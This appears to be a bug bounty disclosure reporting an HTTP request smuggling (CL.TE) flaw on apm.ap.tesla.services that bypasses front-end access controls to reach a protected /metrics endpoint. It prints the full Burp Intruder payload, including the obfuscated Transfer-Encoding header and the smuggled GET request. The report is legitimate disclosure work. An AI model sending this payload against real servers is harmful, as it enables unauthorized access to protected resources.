Summary by riramar
The service under https://apm.ap.tesla.services is vulnerable to HTTP Request Smuggling allowing an attacker to bypass front-end security controls.
*.tesla.services
Web App
https://apm.ap.tesla.services/metrics
As a PoC, I'm using the URL https://apm.ap.tesla.services/metrics, which returns 401 (Unauthorized) when you access it.
By performing the Burp Intruder attack below with the CLTE payload, an attacker can bypass the front-end and access https://apm.ap.tesla.services/metrics.
Notice the path /metrics is just an example. Any protected resource using the same security controls can be exploited in the same way.
Please check the video attached (apm.ap.tesla.services-poc.mp4) for reference to reproduce and I'm providing the Burp Intruder payload below.
POST /?cb=906971031432954 HTTP/1.1
Transfer-Encoding : chunked
Host: apm.ap.tesla.services
Connection: keep-alive
ID: §0§
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

1
Z
0

GET /metrics HTTP/1.1
Host: apm.ap.tesla.services

0